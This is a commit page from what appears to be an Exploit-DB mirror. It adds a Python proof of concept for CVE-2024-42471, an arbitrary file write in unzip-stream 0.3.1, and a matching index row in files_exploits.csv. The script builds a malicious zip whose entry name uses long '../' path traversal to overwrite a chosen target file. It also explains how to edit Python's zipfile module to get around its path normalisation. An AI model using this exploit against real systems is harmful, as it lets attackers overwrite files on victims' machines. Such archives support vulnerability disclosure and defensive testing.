bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-05-02 00:03:05 +00:00
commit 00de2ea641
2 changed files with 33 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
exploits/nodejs/local/52276.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: unzip-stream 0.3.1 - Arbitrary File Write
# Date: 18th April, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/mhr3/unzip-stream
# Version: unzip-stream 0.3.1
# Tested on: Ubuntu
# CVE: CVE-2024-42471
# NB: Python's built-in `zipfile` module has limitations on the `arcname` parameter.
# To bypass this restriction, edit the module's source code (`zipfile.py`) and comment out the following line:
# arcname = os.path.normpath(os.path.splitdrive(arcname)[1])
# For a more detailed explanation, feel free to check out my blog post here: https://themcsam.github.io/posts/unzip-stream-PoC/
import zipfile
import os
import sys
file_path = './poc' # Change to the file which contains the data to write
zip_name = 'evil.zip'
path_to_overwrite_file = 'home/mcsam/pocc' # Change to target file to write/overwrite
if not os.path.isfile(file_path):
print(f"Error: File '{file_path}' does not exist.")
sys.exit()
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
zipf.write(file_path, \
arcname=f'hack/../../../../../../../../../../../../../../{path_to_overwrite_file}')
print(f"File '{file_path}' has been zipped as '{zip_name}'.")

1
files_exploits.csv
View file

@ -12554,6 +12554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23589,exploits/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,,,,,,https://www.securityfocus.com/bid/9479/info
23587,exploits/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,CVE-2004-2104;OSVDB-3720,,,,,https://www.securityfocus.com/bid/9479/info
23588,exploits/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,CVE-2004-2104;OSVDB-3721,,,,,https://www.securityfocus.com/bid/9479/info
52276,exploits/nodejs/local/52276.py,"unzip-stream 0.3.1 - Arbitrary File Write",2025-04-30,cybersploit,local,nodejs,,2025-04-30,2025-04-30,0,CVE-2024-42471,,,,,https://themcsam.github.io/posts/unzip-stream-PoC/
43054,exploits/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",webapps,nodejs,,2017-10-25,2017-10-25,0,CVE-2017-15878,,,,,
43053,exploits/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",webapps,nodejs,,2017-10-25,2017-10-25,0,CVE-2017-15879,,,,,
43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,,

Can't render this file because it is too large.